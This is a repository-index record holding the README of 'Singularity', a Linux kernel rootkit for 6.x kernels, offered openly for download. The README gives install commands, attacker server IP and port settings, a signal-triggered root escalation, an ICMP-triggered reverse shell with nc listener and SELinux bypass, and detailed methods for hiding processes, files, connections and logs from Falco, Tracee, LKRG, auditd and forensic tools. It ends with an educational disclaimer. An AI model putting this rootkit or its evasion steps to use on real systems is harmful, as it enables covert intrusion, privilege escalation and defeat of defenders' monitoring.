{"id":48872937,"url":"https://github.com/MatheuZSecurity/Singularity","last_synced_at":"2026-05-01T23:01:06.174Z","repository":{"id":316267896,"uuid":"1062196393","full_name":"MatheuZSecurity/Singularity","owner":"MatheuZSecurity","description":"Stealthy Linux Kernel Rootkit for modern kernels (6x)","archived":false,"fork":false,"pushed_at":"2026-04-21T22:47:44.000Z","size":251,"stargazers_count":1619,"open_issues_count":1,"forks_count":178,"subscribers_count":18,"default_branch":"main","last_synced_at":"2026-04-22T00:35:58.863Z","etag":null,"topics":["ftrace","hidden","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/MatheuZSecurity.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-23T00:07:21.000Z","updated_at":"2026-04-21T22:47:49.000Z","dependencies_parsed_at":"2025-09-23T17:33:43.945Z","dependency_job_id":"51f39fc8-54a3-4d8a-9ef2-3d02405fc949","html_url":"https://github.com/MatheuZSecurity/Singularity","commit_stats":null,"previous_names":["matheuzsecurity/singularity"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/MatheuZSecurity/Singularity","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/MatheuZSecurity","download_url":"https://codeload.github.com/MatheuZSecurity/Singularity/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/MatheuZSecurity%2FSingularity/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32515838,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-30T13:12:12.517Z","status":"online","status_checked_at":"2026-05-01T02:00:05.856Z","response_time":64,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ftrace","hidden","hooking","kernel","linux","lkm","poc","rootkit","syscall"],"created_at":"2026-04-15T23:00:24.313Z","updated_at":"2026-05-01T23:01:06.156Z","avatar_url":"https://github.com/MatheuZSecurity.png","language":"C","funding_links":[],"categories":["Open-Source PoCs \u0026 Sample Projects"],"sub_categories":["x86/x64 Assembly"],"readme":"# Singularity - Stealthy Linux Kernel Rootkit\n\n\u003cimg src=\"https://i.imgur.com/n3U5fsP.jpeg\" alt=\"Singularity Rootkit\" width=\"600\"/\u003e\n\n\u003e *\"Shall we give forensics a little work?\"*\n\n**Singularity** is a powerful Linux Kernel Module (LKM) rootkit designed for modern 6.x kernels. It provides comprehensive stealth capabilities through advanced system call hooking via ftrace infrastructure.\n\n**Full Research Article (outdated version)**: [Singularity: A Final Boss Linux Kernel Rootkit](https://blog.kyntra.io/Singularity-A-final-boss-linux-kernel-rootkit)\n\n**EDR Evasion Case Study**: [Bypassing Elastic EDR with Singularity](https://matheuzsecurity.github.io/hacking/bypassing-elastic/)\n\n**POC Video: Singularity vs eBPF security tools**: [Singularity vs eBPF security tools](https://www.youtube.com/watch?v=ByEp137w3Ks)\n\n**Breaking eBPF Security with Singularity hooks**: [Breaking eBPF](https://matheuzsecurity.github.io/hacking/ebpf-security-tools-hacking/)\n\n## What is Singularity?\n\nSingularity is a sophisticated rootkit that operates at the kernel level, providing:\n\n- **Process Hiding**: Make any process completely invisible to the system\n- **File \u0026 Directory Hiding**: Conceal files using pattern matching\n- **Network Stealth**: Hide TCP/UDP connections, ports, and conntrack entries\n- **Privilege Escalation**: Signal-based instant root access\n- **Log Sanitization**: Filter kernel logs and system journals in real-time\n- **Self-Hiding**: Remove itself from module lists and system monitoring\n- **Remote Access**: ICMP-triggered reverse shell with automatic hiding\n- **Anti-Detection**: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime Guard (LKRG), and prevent io_uring bypass attempts\n- **Audit Evasion**: Drop audit messages for hidden processes at netlink level with statistics tracking and socket inode filtering\n- **Memory Forensics Evasion**: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo\n- **Cgroup Filtering**: Filter hidden PIDs from cgroup.procs\n- **Syslog Evasion**: Hook do_syslog to filter klogctl() kernel ring buffer access\n- **Debugfs Evasion**: Filter output of tools like debugfs that read raw block devices\n- **Conntrack Filtering**: Hide connections from /proc/net/nf_conntrack and netlink SOCK_DIAG/NETFILTER queries\n- **SELinux Evasion**: Automatic SELinux enforcing mode bypass on ICMP trigger\n- **LKRG Bypass**: Evade Linux Kernel Runtime Guard detection mechanisms\n- **eBPF Security Bypass**: Hide processes from eBPF-based runtime security tools (Falco, Tracee)\n\n## Features\n\n- Signal-based privilege elevation (kill -59)\n- Complete process hiding from /proc and monitoring tools\n- Pattern-based filesystem hiding for files and directories\n- Network connection concealment from netstat, ss, conntrack, and packet analyzers\n- Advanced netlink filtering (SOCK_DIAG, NETFILTER/conntrack messages)\n- Real-time kernel log filtering for dmesg, journalctl, and klogctl\n- Module self-hiding from lsmod and /sys/module\n- Automatic kernel taint flag normalization\n- BPF data filtering to prevent eBPF-based detection\n- io_uring protection against asynchronous I/O bypass\n- Log masking for kernel messages and system logs\n- Evasion of standard rootkit detectors (unhide, chkrootkit, rkhunter)\n- Automatic child process tracking and hiding via tracepoint hooks\n- Multi-architecture support (x64 + ia32)\n- Network packet-level filtering with raw socket protection\n- Protection against all file I/O variants (read, write, splice, sendfile, tee, copy_file_range)\n- Netlink-level audit message filtering with statistics tracking to evade auditd detection\n- Socket inode tracking for comprehensive network hiding\n- Cgroup PID filtering to prevent detection via `/sys/fs/cgroup/*/cgroup.procs`\n- TaskStats netlink blocking to prevent PID enumeration\n- /proc/kcore filtering to evade memory forensics tools (Volatility, crash, gdb)\n- do_syslog hook to filter klogctl() and prevent kernel ring buffer leaks\n- Block device output filtering to evade debugfs and similar disk forensics tools\n- journalctl -k output filtering via write hook\n- SELinux enforcing mode bypass capability for ICMP-triggered shells\n- LKRG integrity checks bypass for hidden processes\n- Falco event hiding via BPF ringbuffer and perf event interception\n\n## Installation\n\n### Prerequisites\n\n- Linux kernel 6.x\n- Kernel headers for your running kernel\n- GCC and Make\n- Root access\n\n### Quick Install\n```bash\ncd /dev/shm\ngit clone https://github.com/MatheuZSecurity/Singularity\ncd Singularity\nsudo bash setup.sh\ncd ..\n```\n\nThat's it. The module automatically:\n- Hides itself from lsmod, /proc/modules, /sys/module\n- Clears kernel taint flags\n- Filters sensitive strings from dmesg, journalctl -k, klogctl\n- Starts protecting your hidden files and processes\n\n### Important Notes\n\n**The module automatically hides itself after loading**\n\n**There is no unload feature - reboot required to remove**\n\n**Test in a VM first - cannot be removed without restarting**\n\n## Configuration\n\n### Set Your Server IP and Port\n\n**Edit `include/core.h`:**\n```c\n#define YOUR_SRV_IP \"192.168.1.100\"  // Change this to your server IP\n#define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } }  // IPv6 if needed\n```\n\n**Edit `modules/icmp.c`:**\n```c\n#define SRV_PORT \"8081\"  // Change this to your desired port\n```\n\n**Edit `modules/bpf_hook.c`:**\n```c\n#define HIDDEN_PORT 8081  // Must match SRV_PORT\n```\n\n**Edit `modules/hiding_tcp.c`:**\n```c\n#define PORT 8081  // Must match SRV_PORT\n```\n\n**Important**: All port definitions must match for proper network hiding and ICMP reverse shell functionality.\n\n## Usage\n\n### Hide Processes\n```bash\n# Hide current shell\nkill -59 $$\n\n# Hide specific process\nkill -59 \u003cPID\u003e\n```\n\nProcess will be invisible to ps, top, htop, /proc, and all monitoring tools. All child processes are automatically tracked and hidden.\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/wX2g459.png\"\u003e\n\u003c/p\u003e\n\n### Hide Files \u0026 Directories\n\nFiles matching your configured patterns are automatically hidden:\n```bash\nmkdir singularity\necho \"secret\" \u003e singularity/data.txt\n\n# Invisible to ls, find, locate\nls -la | grep singularity\n# (no output)\n\n# But you can still access it\ncat singularity/data.txt\n# secret\n\n# cd is blocked for security\ncd singularity\n# bash: cd: singularity: No such file or directory\n```\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/a8eb6KS.png\"\u003e\n\u003c/p\u003e\n\n### Become Root\n\n**Signal-based method:**\n```bash\nkill -59 $$\nid  # uid=0(root)\n```\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/jCoi0LV.png\"\u003e\n\u003c/p\u003e\n\n### Hide Network Connections\n\nConnections on your configured port (default: 8081) are automatically hidden:\n```bash\nnc -lvnp 8081\n\n# Invisible to all monitoring\nss -tulpn | grep 8081        # (no output)\nnetstat -tulpn | grep 8081   # (no output)\nlsof -i :8081                # (no output)\ncat /proc/net/nf_conntrack | grep 8081  # (no output)\n\n# Even advanced netlink queries are filtered\nss -tapen | grep 8081        # (no output)\nconntrack -L | grep 8081     # (no output)\n```\n\nPackets are dropped at raw socket level (tpacket_rcv) and hidden from:\n- /proc/net/* interfaces (tcp, tcp6, udp, udp6)\n- /proc/net/nf_conntrack\n- Netlink SOCK_DIAG queries (used by ss, lsof)\n- Netlink NETFILTER/conntrack messages (used by conntrack tool)\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/WUuLu1q.png\"\u003e\n\u003c/p\u003e\n\n### ICMP Reverse Shell\n\nTrigger a hidden reverse shell remotely with automatic SELinux bypass:\n\n**1. Start listener:**\n```bash\nnc -lvnp 8081  # Use your configured port\n```\n\n**2. Send ICMP trigger:**\n```bash\nsudo python3 scripts/trigger.py \u003ctarget_ip\u003e\n```\n\n**3. Receive root shell** (automatically hidden with all child processes, SELinux enforcing mode bypassed if active)\n\n\u003cp align=\"center\"\u003e\n\u003cimg src=\"https://i.imgur.com/4bmbmwY.png\"\u003e\n\u003c/p\u003e\n\n## Protection Mechanisms\n\n### Ftrace Control Protection\n\nAll attempts to disable ftrace are silently intercepted and blocked:\n```bash\necho 0 \u003e /proc/sys/kernel/ftrace_enabled       # Appears successful but does nothing\n```\n\nProtected syscalls: write, writev, pwrite64, pwritev, pwritev2, sendfile, sendfile64, splice, vmsplice, tee, copy_file_range, io_uring_enter (with intelligent per-PID caching)\n\n### BPF Syscall Filtering\n\nThe bpf_hook.c module implements a sophisticated anti-detection system against eBPF-based security tools. Rather than blocking BPF syscalls entirely (which would be a detection fingerprint), it selectively filters data at the kernel level to make hidden processes and connections invisible to eBPF programs.\n\n**Strategy**: Intercept data collection and reporting functions used by eBPF programs, not the BPF syscall itself. This allows legitimate eBPF tools to run normally while preventing them from seeing hidden resources.\n\n**Protected resources**:\n- Hidden processes and their entire process tree (up to 10 parent levels)\n- Network connections on configured port (default: 8081) or to configured IP address\n- Socket inodes associated with hidden processes\n\n**Interception points**:\n- Iterator execution (process/socket enumeration)\n- Ringbuffer operations (event submission to userspace)\n- BPF map operations (PID lookups and insertions)\n- Perf event output (legacy eBPF event delivery)\n- Seq file writes (output formatting)\n- Program execution (context-based filtering)\n\nThis approach defeats eBPF security tools without triggering alerts that would come from blocking BPF operations entirely.\n\n### io_uring Protection\n\nProtection against io_uring bypass in ftrace_enabled and tracing_on attempts with intelligent caching (1 second cache per PID to prevent repeated process scanning and reduce overhead)\n\n### Log Sanitization\n\nReal-time filtering of sensitive strings from all kernel log interfaces:\n\n| Interface | Hook | Status |\n|-----------|------|--------|\n| `dmesg` | read hook on /proc/kmsg | Filtered |\n| `journalctl -k` | write hook (output filtering) | Filtered |\n| `klogctl()` / `syslog()` | do_syslog hook | Filtered |\n| `/sys/kernel/debug/tracing/*` | read hook | Filtered |\n| `/var/log/kern.log`, `syslog`, `auth.log` | read hook | Filtered |\n| `/proc/kallsyms`, `/proc/kcore`, `/proc/vmallocinfo` | read hook | Filtered |\n| `/proc/net/nf_conntrack` | read hook | Filtered |\n\nFiltered keywords: taint, journal, singularity, Singularity, matheuz, zer0t, kallsyms_lookup_name, obliviate, hook, hooked_, constprop, clear_taint, ftrace_helper, fh_install, fh_remove\n\n**Note**: Audit messages for hidden PIDs are dropped at netlink level with statistics tracking (get_blocked_audit_count, get_total_audit_count)\n\n### Disk Forensics Evasion\n\nSingularity hooks the write syscall to detect and filter output from disk forensics tools:\n\n**How it works:**\n1. Detects if process has a block device open (`/dev/sda`, `/dev/nvme0n1`, etc)\n2. Detects debugfs-style output patterns (inode listings, filesystem metadata)\n3. Sanitizes hidden patterns in-place (replaces with spaces to maintain buffer size/checksums)\n```bash\n# Hidden files are invisible even to raw disk analysis\ndebugfs /dev/sda3 -R 'ls -l /home/user/singularity'\n#            (spaces where \"singularity\" was)\n\n# The pattern is sanitized in the output buffer\n# Checksums remain valid, no corruption\n```\n\n**Detected patterns:**\n- `debugfs:` prefix\n- Inode listings with parentheses\n- `Inode count:`, `Block count:`, `Filesystem volume name:`\n- `Filesystem UUID:`, `e2fsck`, `Inode:`\n\n### Process Hiding Implementation\n\nComplete hiding from syscalls and kernel interfaces:\n- /proc/[pid]/* (openat, readlinkat blocked)\n- getdents, getdents64 (directory listing filtered)\n- stat, lstat, statx, newfstatat (metadata hidden)\n- kill with signal 0 (returns ESRCH)\n- getsid, getpgid, getpgrp (returns ESRCH)\n- sched_getaffinity, sched_getparam, sched_getscheduler, sched_rr_get_interval (returns ESRCH)\n- getpriority (returns ESRCH)\n- sysinfo (process count adjusted)\n- pidfd_open (returns ESRCH)\n- TaskStats netlink queries (returns ESRCH)\n- Cgroup PIDs filtered from cgroup.procs\n\nChild processes automatically tracked via sched_process_fork tracepoint hook.\n\n### LKRG Bypass\n\nSingularity implements comprehensive evasion against Linux Kernel Runtime Guard:\n\n**Bypassed checks:**\n- Process credential validation (p_cmp_creds)\n- Task structure integrity (p_cmp_tasks)\n- Control Flow Integrity validation (p_ed_pcfi_validate_sp, p_ed_enforce_pcfi)\n- Kernel integrity checks (p_check_integrity)\n- Exploit detection subsystem (p_exploit_detection_init)\n- User-mode helper tracking (p_call_usermodehelper_entry, p_call_usermodehelper_exec_entry)\n- Task dumping and enumeration (p_dump_task_f, ed_task_add)\n- Kprobe ftrace handler interception\n\n**Features:**\n- Automatic LKRG detection and hook installation\n- Process lineage verification (hides entire process trees up to 64 levels deep)\n- UMH bypass for reverse shell operations\n- Module notification system for detecting LKRG loading\n\nHidden processes are invisible to all LKRG integrity verification mechanisms.\n\n### Falco Bypass\n\nSingularity implements a comprehensive anti-EDR defense system that prevents eBPF-based security tools from detecting hidden processes and network connections. The protection works by intercepting kernel functions that eBPF programs use to collect and report data.\n\n**Protected against:**\n- Falco (event-based runtime security)\n- Tracee (security tracing)\n- bpftool and ss with BPF backend\n\n**Multi-layer interception:**\n\n1. **Iterator filtering** (bpf_iter_run_prog)\n   - Filters sockets on hidden port from TCP/UDP iterators\n   - Hides processes and their children from task iterators\n   - Prevents detection via `ss` and process enumeration tools\n\n2. **Ringbuffer event blocking** (bpf_ringbuf_output, bpf_ringbuf_reserve, bpf_ringbuf_submit)\n   - Detects Falco event structures by analyzing header format\n   - Blocks event allocation, submission, and output for hidden PIDs\n   - Prevents syscall events from reaching Falco userspace agent\n\n3. **BPF map manipulation** (bpf_map_lookup_elem, bpf_map_update_elem)\n   - Returns NULL when eBPF looks up hidden PIDs in maps\n   - Silently drops map insertions where key is a hidden PID\n   - Prevents eBPF security tools from tracking hidden processes\n\n4. **Perf event suppression** (perf_event_output, perf_trace_run_bpf_submit)\n   - Blocks perf-based event submission from hidden processes\n   - Prevents legacy eBPF tools from receiving trace data\n\n5. **Seq file filtering** (bpf_seq_write, bpf_seq_printf)\n   - Scans output data for hidden PIDs before writing\n   - Prevents leakage via /proc interfaces used by eBPF iterators\n\n6. **Program execution control** (__bpf_prog_run)\n   - Blocks eBPF program execution when running in hidden process context\n   - Prevents any eBPF-based monitoring of hidden process internals\n\n**Socket and connection hiding:**\n- Caches hidden IP address for performance\n- Filters sockets based on configured port and configured IP\n- Hides both IPv4 and IPv6 connections\n- Works at iterator level (before data reaches eBPF programs)\n\n**Process lineage tracking:**\n- Traces parent process chain up to 10 levels deep\n- Automatically hides all descendants of hidden processes\n- Ensures child processes spawned after hiding remain invisible\n\nHidden processes and connections generate zero events visible to eBPF security tools.\n\n## Bypassed Security Tools\n\n**Process Monitoring**: ps, top, htop, atop, pidof\n\n**Filesystem**: ls, find, locate, stat, lstat, readlink, tree\n\n**Disk Forensics**: debugfs, e2fsck (output filtered via write hook)\n\n**Memory Forensics**: Volatility, crash, gdb (via /proc/kcore filtering)\n\n**Network**: netstat, ss, lsof, tcpdump, wireshark, conntrack, nload, iftop, /proc/net/*\n\n**Logs \u0026 Traces**: dmesg, journalctl, klogctl, strace, ltrace, ftrace, perf\n\n**Rootkit Detectors**: unhide, chkrootkit, rkhunter, OSSEC\n\n**Module Detection**: lsmod, modinfo, /sys/module, /proc/modules, kmod\n\n**Kernel Security**: LKRG (Linux Kernel Runtime Guard)\n\n**eBPF Security Tools**:\n- Falco (runtime security monitoring)\n- Tracee (security tracing)\n- bpftrace, bpftool (when used for monitoring)\n\n**EDR/Monitoring**: io_uring-based monitors, some Linux EDR solutions, auditd\n\n## Syscall Hooks\n\n| Syscall/Function | Module | Purpose |\n|---------|--------|---------|\n| getdents, getdents64 | hiding_directory.c | Filter directory entries, hide PIDs |\n| stat, lstat, newstat, newlstat, statx, newfstatat | hiding_stat.c | Hide file metadata, adjust nlink |\n| getpriority | hiding_stat.c | Hide priority queries for hidden PIDs |\n| openat | open.c | Block access to hidden /proc/[pid] |\n| readlinkat | hiding_readlink.c | Block symlink resolution |\n| chdir | hiding_chdir.c | Prevent cd into hidden dirs |\n| read, pread64, readv, preadv | clear_taint_dmesg.c | Filter kernel logs, kcore, kallsyms, cgroup PIDs, nf_conntrack |\n| do_syslog | clear_taint_dmesg.c | Filter klogctl()/syslog() kernel ring buffer |\n| sched_debug_show | clear_taint_dmesg.c | Filter scheduler debug output |\n| write, writev, pwrite64, pwritev, pwritev2 | hooks_write.c | Block ftrace control + filter disk forensics + filter journalctl output |\n| sendfile, sendfile64, copy_file_range | hooks_write.c | Block file copies to protected files |\n| splice, vmsplice, tee | hooks_write.c | Block pipe-based writes to protected files |\n| io_uring_enter | hooks_write.c | Block async I/O bypass with PID caching |\n| kill | become_root.c | Root trigger + hide processes |\n| getsid, getpgid, getpgrp | become_root.c | Returns ESRCH for hidden PIDs |\n| sched_getaffinity, sched_getparam, sched_getscheduler, sched_rr_get_interval | become_root.c | Returns ESRCH for hidden PIDs |\n| sysinfo | become_root.c | Adjusts process count |\n| pidfd_open | become_root.c | Returns ESRCH for hidden PIDs |\n| tcp4_seq_show, tcp6_seq_show | hiding_tcp.c | Hide TCP connections from /proc/net |\n| udp4_seq_show, udp6_seq_show | hiding_tcp.c | Hide UDP connections from /proc/net |\n| tpacket_rcv | hiding_tcp.c | Drop packets at raw socket level |\n| recvmsg, recvfrom | audit.c | Filter netlink SOCK_DIAG and NETFILTER messages |\n| netlink_unicast | audit.c | Drop audit messages for hidden PIDs |\n| audit_log_start | audit.c | Block audit log creation for hidden processes |\n| bpf | bpf_hook.c | Filter eBPF operations for hidden PIDs |\n| bpf_iter_run_prog | bpf_hook.c | Hide hidden processes from BPF iterators |\n| bpf_seq_write, bpf_seq_printf | bpf_hook.c | Filter BPF seq file output |\n| bpf_ringbuf_output, bpf_ringbuf_reserve, bpf_ringbuf_submit | bpf_hook.c | Filter Falco events via ringbuffer |\n| bpf_map_lookup_elem, bpf_map_update_elem | bpf_hook.c | Filter BPF map operations |\n| perf_event_output, perf_trace_run_bpf_submit | bpf_hook.c | Filter perf events for hidden processes |\n| __bpf_prog_run | bpf_hook.c | Filter BPF program execution |\n| icmp_rcv | icmp.c | ICMP-triggered reverse shell with SELinux bypass |\n| taskstats_user_cmd | task.c | Block TaskStats queries for hidden PIDs |\n| sched_process_fork (tracepoint) | trace.c | Track child processes |\n| kprobe_ftrace_handler | lkrg_bypass.c | Bypass LKRG kprobe detection |\n| p_cmp_creds, p_cmp_tasks | lkrg_bypass.c | Bypass LKRG credential checks |\n| p_ed_pcfi_validate_sp, p_ed_enforce_pcfi | lkrg_bypass.c | Bypass LKRG CFI validation |\n| p_check_integrity | lkrg_bypass.c | Bypass LKRG integrity checks |\n| p_dump_task_f, ed_task_add | lkrg_bypass.c | Hide from LKRG task enumeration |\n| p_call_usermodehelper_entry, p_call_usermodehelper_exec_entry | lkrg_bypass.c | Bypass LKRG UMH tracking |\n| p_exploit_detection_init | lkrg_bypass.c | Bypass LKRG exploit detection |\n| tainted_mask (kthread) | reset_tainted.c | Clear kernel taint flags |\n| module_hide_current | hide_module.c | Remove from module lists and sysfs |\n\n**Multi-Architecture Support**: x86_64 (`__x64_sys_*`) and ia32 (`__ia32_sys_*`, `__ia32_compat_sys_*`)\n\n## Tested Kernel Versions\n\n| Kernel Version | Distribution | Status | Notes |\n|---------------|--------------|--------|-------|\n| 6.8.0-79-generic | Ubuntu 22.04 / 24.04 | Stable | Primary development environment |\n| 6.12.0-174.el10.x86_64 | CentOS Stream 10 | Stable | RHEL-based kernel |\n| 6.12.48+deb13-amd64 | Debian 13 (Trixie) | Stable | Debian kernel |\n| 6.17.8-300.fc43.x86_64 | Fedora 43 | Stable | SELinux enforcing bypass validated |\n| 6.17.0-8-generic | Ubuntu 25.10 | Stable | Newer generic kernel, fully functional |\n| 6.14.0-37-generic | Ubuntu 24.04 | Stable | LKRG and Falco bypass validated |\n| 6.12.25-amd64 | Kali Linux | Stable | Kali 6.12.25-1kali1 |\n\n## The Plot\n\nUnfortunately for some...\n\nEven with all these filters, protections, and hooks, there are still ways to detect this rootkit.\n\nBut if you're a good forensic analyst, DFIR professional, or malware researcher, I'll let you figure it out on your own.\n\nI won't patch for this, because it will be much more OP ;)\n\n## Credits\n\n**Singularity** was created by **MatheuZSecurity** (Matheus Alves)\n\n- LinkedIn: [mathsalves](https://www.linkedin.com/in/mathsalves/)\n- Discord: `kprobe`\n\n**Join Rootkit Researchers**: Discord - [https://discord.gg/66N5ZQppU7](https://discord.gg/66N5ZQppU7)\n\n### Code References\n\n- [fuxSocy](https://github.com/iurjscsi1101500/fuxSocy/tree/main)\n- [Adrishya](https://github.com/malefax/Adrishya/blob/main/Adrishya.c#L158)\n- [MatheuZSecurity/Rootkit](https://github.com/MatheuZSecurity/Rootkit)\n\n### Research Inspiration\n\n- [KoviD](https://github.com/carloslack/KoviD)\n- [Basilisk](https://github.com/lil-skelly/basilisk)\n- [GOAT Diamorphine rootkit](https://github.com/m0nad/Diamorphine)\n\n## Contributing\n\n- Submit pull requests for improvements\n- Report bugs via GitHub issues\n- Suggest new evasion techniques\n- Share detection methods (for research)\n\n**Found a bug?** Open an issue or contact me on Discord: `kprobe`\n\n**FOR EDUCATIONAL AND RESEARCH PURPOSES ONLY**\n\nSingularity was created as a research project to explore the limits of kernel-level stealth techniques. The goal is to answer one question: **\"How far can a rootkit hide if it manages to infiltrate and load into a system?\"**\n\nThis project exists to:\n- Push the boundaries of offensive security research\n- Help defenders understand what they're up against\n- Provide a learning resource for kernel internals and evasion techniques\n- Contribute to the security community's knowledge base\n\n**I am not responsible for any misuse of this software.** If you choose to use Singularity for malicious purposes, that's on you. This tool is provided as-is for research, education, and authorized security testing only.\n\nTest only on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal in most jurisdictions.\n\n**Be a researcher, not a criminal.**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMatheuZSecurity%2FSingularity","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMatheuZSecurity%2FSingularity","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMatheuZSecurity%2FSingularity/lists"}